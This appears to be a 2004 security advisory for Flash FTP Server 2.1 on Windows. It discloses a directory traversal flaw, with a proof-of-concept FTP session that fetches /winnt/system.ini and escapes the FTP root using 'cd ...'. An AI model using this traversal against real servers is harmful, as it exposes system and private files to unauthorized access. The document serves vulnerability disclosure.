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Application:    Flash FTP Server
Vendors:        http://www.net2soft.com/downloads/flashftpserver.exe
Version:        1.0(2.1?)
Platforms:      Windows
Bug:            Directory Traversal
Date:           2004-06-9
Author:         CoolICE
e-mail:         CoolICE#China.com
C:\>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
C:\>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
---> PASS CoolICE@xxxxxxxxx
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.